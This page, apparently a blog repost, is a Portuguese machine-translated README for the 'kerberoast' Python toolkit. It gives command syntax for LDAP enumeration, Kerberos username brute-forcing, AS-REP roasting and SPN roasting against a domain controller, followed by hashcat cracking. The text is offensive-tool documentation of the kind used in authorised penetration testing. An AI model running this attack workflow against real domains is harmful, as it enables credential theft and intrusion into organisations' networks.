Kerberoast - Ataque Kerberoast -Pure Python-


Kit de ferramentas de ataque Kerberos -pure python- 




Instalar

pip3 install kerberoast

PrĂŠ-requisitos

Python 3.6 Consulte requisitos.txt

Para o impaciente

IMPORTANTE: Os formatos de destino de URL aceitos para LDAP e Kerberos sĂŁo os seguintes
<ldap_connection_url><protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>:<protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Etapas -com SSPI-: kerberoast auto <DC_ip>

Passos -SSPI nĂŁo usado-:

  1. Procure usuĂĄrios vulnerĂĄveis via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast contra usuĂĄrios no ldapenum_asrep_users.txtarquivo
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast contra usuĂĄrios no ldapenum_spn_users.txtarquivo
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast e ASPREP roast output com hashcat

Comandos

ldap

Este grupo de comando é para enumerar usuários potencialmente vulneráveis ​​via LDAP.

Estrutura de comando

    kerberoast ldap <type> <ldap_connection_url> <options>

Type: Suporta trĂŞs tipos de usuĂĄrios a serem enumerados

  1. spnEnumera usuĂĄrios com servicePrincipalNameconjunto de atributos.
  2. asrepEnumera os usuĂĄrios com DONT_REQ_PREAUTHsinalizador definido em seu atributo UAC.
  3. all Inicia todas as enumeraçþes mencionadas acima.

ldap_connection_url: Especifica a credencial do usuĂĄrio e o servidor de destino no formato de url msldap (consulte a ajuda)

options::
    -oNome da base do arquivo de saĂ­da

bruto

Este comando ĂŠ para realizar a enumeração do nome de usuĂĄrio forçando o serviço Kerberos com possĂ­veis candidatos a nome de usuĂĄrio

Estrutura de comando

    kerberoast brute <realm> <dc_ip> <targets> <options>

realm: O reino Kerberos geralmente se parece com COMPANY.corp
dc_ip: IP ou nome de host do controlador de domĂ­nio
targets: Caminho para o arquivo que contĂŠm os nomes de usuĂĄrio possĂ­veis
options::
    -oNome de base do arquivo de saĂ­da

uma rajada

Este comando ĂŠ para realizar o ataque ASREProast

Estrutura de comando

    kerberoast asreproast <dc_ip> <options>

dc_ip: IP ou o nome do controlador de domĂ­nio
options:
    -rEspecifica o domĂ­nio Kerberos a ser utilizado. Ele substitui todas as outras informaçþes do reino.
    -o: Nome de base do arquivo de saĂ­da
    -t: Caminho para o arquivo que contĂŠm os nomes de usuĂĄrio para realizar o ataque
    -u: Especifica o usuĂĄrio para realizar o ataque. O formato ĂŠ <username>ou, <username>@<realm>mas no primeiro caso, a -ropção deve ser usada para especificar o domĂ­nio

spnroast

Este comando ĂŠ para executar o ataque SPNroast (tambĂŠm conhecido como kerberoast).

Estrutura de comando

    kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Especifica a credencial do usuĂĄrio e o servidor de destino no formato de URL Kerberos (consulte a ajuda)

options::
    -rEspecifica o reino Kerberos a ser usado. Ele substitui todas as outras informaçþes do reino.
    -o: Nome de base do arquivo de saĂ­da
    -t: Caminho para o arquivo que contĂŠm os nomes de usuĂĄrio para realizar o ataque
    -u: Especifica o usuĂĄrio para realizar o ataque. O formato ĂŠ <username>ou, <username>@<realm>mas no primeiro caso, a -ropção deve ser usada para especificar o domĂ­nio



ComentĂĄrios

Ebook

Postagens mais visitadas